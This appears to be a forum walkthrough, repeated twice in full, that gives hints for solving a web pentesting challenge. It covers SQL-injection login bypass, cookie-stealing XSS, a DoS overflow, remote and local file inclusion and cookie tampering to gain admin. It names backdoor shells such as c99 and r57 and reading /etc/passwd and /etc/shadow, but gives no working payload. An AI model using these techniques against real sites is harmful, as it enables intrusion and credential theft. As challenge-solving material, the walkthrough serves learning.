Main:advertisement
An article on the Pentesting challenge. Sorry if it contains spoilers.
+--------------------------------+
| PEN TEST CHALLENGE ONE! |
+--------------------------------+
Well lets start.
Once you get onto the challenge page there are 6 links to different parts of the site. There is also a login on the main page. To start off with let's scout the site for anything we can find which maybe use to us. Oh look an admin panel...Let's think. How do we bypass a login? What is the most obvious way? Try a few methods out and I'm sure after a while you'll get it. If you haven't got it already, think SQL.
The way an SQL Login works is basically when it connects to the database it goes something like
SELECT * FROM users WHERE user='[YOUR SQL LOGIN INJECTION HERE] AND password=[.......];
which basically shows us that it finishes off that statement and gives a logical paradox: use an expres<em></em>sion that will escape the current field in the SQL statement, always be true, and make it end the SQL statement
SELECT * FROM users WHERE user=' [SQL QUEREY HERE]
So the "AND PASSWORD=" bit would be commented out.
Hopefully now you have the points from the admin login vulnerability. Let's move on.
Let's move onto another exploit. In another part of the site.
The next one I'm going to explain to you is an exploit in member's tools. You need to check every field you can for this exploit. The vulnerability is generally used by attackers to exploit a site with cookie stealers. (If it helps use FireFox's addon - TamperData).
This is quite an easy one. The only problem with it is, is that you have to search every field. God, George Bush Sucks.
Hopefully now you understand what I mean.
Now, we move on to another common attack used generally by script Kiddies using NetTools or other forms of skiddie programs. This is found on a different page. I'll let you find it yourself. It's located where people find out new information about the world and other events which are going on. There is information on the page which contains a lot of useful information for the exploit. The exploit should overflow the connection. How do you send lots of data at once to overflow it?!!11
That's right. All the information you need is given on the page. Check some of the information that is shared between the pages is vulnerable to an overflow. Now enter overflow data into it and VIOLIA! You've got it:)
Only two last things to do.
As I'm sure you've seen in the URL is '?page=...' so that shows that its including a local or remote file. There is an exploit about this.
http://en.wikipedia.org/wiki/Remote_File_Inclusion
This should tell you most everything you need to know about it. However if it doesn't RFI in very short means that you can take a file from another source and include it onto that website, so if you wanted to you could include a backdoor shell(c99, r57 are two very common ones) onto the site. Where as Local File Inclusion basically does the same but with local files(on the server's machine)(/etc/passwd, /etc/shadow). This should give you a good indication of what you need to do.
Last but not least is a cookie exploit(135 Points) which is the most important after the DoS exploit(125 Points). As I'm sure one of the first things you noticed about the site was that there was a Session ID being shown in the URL (PHPSESSID). You want to make it so the cookies think that you're admin. So using your brain, using TRUE or FALSE statements how would you trick something/someone into thinking that you are admin? Well I hope you got it.
One last tip, It is somewhere which is very obvious to set a variable.
Well I hope you enjoyed my article and I would love to get some feedback on what everyone thought.
I hope it helps some people.
Take care. ~x~
~~~~~~~~~~~~~
Shout outs to:
~~~~~~~~~~~~~
Cyph3rHell for helping me complete the challenge myself and just for being really cool.
Zephyr_Pure for checking the article over for me and giving me some changes for it and obviously for publishing it.
Thanks guys.
| PEN TEST CHALLENGE ONE! |
+--------------------------------+
Well lets start.
Once you get onto the challenge page there are 6 links to different parts of the site. There is also a login on the main page. To start off with let's scout the site for anything we can find which maybe use to us. Oh look an admin panel...Let's think. How do we bypass a login? What is the most obvious way? Try a few methods out and I'm sure after a while you'll get it. If you haven't got it already, think SQL.
The way an SQL Login works is basically when it connects to the database it goes something like
SELECT * FROM users WHERE user='[YOUR SQL LOGIN INJECTION HERE] AND password=[.......];
which basically shows us that it finishes off that statement and gives a logical paradox: use an expres<em></em>sion that will escape the current field in the SQL statement, always be true, and make it end the SQL statement
SELECT * FROM users WHERE user=' [SQL QUEREY HERE]
So the "AND PASSWORD=" bit would be commented out.
Hopefully now you have the points from the admin login vulnerability. Let's move on.
Let's move onto another exploit. In another part of the site.
The next one I'm going to explain to you is an exploit in member's tools. You need to check every field you can for this exploit. The vulnerability is generally used by attackers to exploit a site with cookie stealers. (If it helps use FireFox's addon - TamperData).
This is quite an easy one. The only problem with it is, is that you have to search every field. God, George Bush Sucks.
Hopefully now you understand what I mean.
Now, we move on to another common attack used generally by script Kiddies using NetTools or other forms of skiddie programs. This is found on a different page. I'll let you find it yourself. It's located where people find out new information about the world and other events which are going on. There is information on the page which contains a lot of useful information for the exploit. The exploit should overflow the connection. How do you send lots of data at once to overflow it?!!11
That's right. All the information you need is given on the page. Check some of the information that is shared between the pages is vulnerable to an overflow. Now enter overflow data into it and VIOLIA! You've got it:)
Only two last things to do.
As I'm sure you've seen in the URL is '?page=...' so that shows that its including a local or remote file. There is an exploit about this.
http://en.wikipedia.org/wiki/Remote_File_Inclusion
This should tell you most everything you need to know about it. However if it doesn't RFI in very short means that you can take a file from another source and include it onto that website, so if you wanted to you could include a backdoor shell(c99, r57 are two very common ones) onto the site. Where as Local File Inclusion basically does the same but with local files(on the server's machine)(/etc/passwd, /etc/shadow). This should give you a good indication of what you need to do.
Last but not least is a cookie exploit(135 Points) which is the most important after the DoS exploit(125 Points). As I'm sure one of the first things you noticed about the site was that there was a Session ID being shown in the URL (PHPSESSID). You want to make it so the cookies think that you're admin. So using your brain, using TRUE or FALSE statements how would you trick something/someone into thinking that you are admin? Well I hope you got it.
One last tip, It is somewhere which is very obvious to set a variable.
Well I hope you enjoyed my article and I would love to get some feedback on what everyone thought.
I hope it helps some people.
Take care. ~x~
~~~~~~~~~~~~~
Shout outs to:
~~~~~~~~~~~~~
Cyph3rHell for helping me complete the challenge myself and just for being really cool.
Zephyr_Pure for checking the article over for me and giving me some changes for it and obviously for publishing it.
Thanks guys.
Posted by 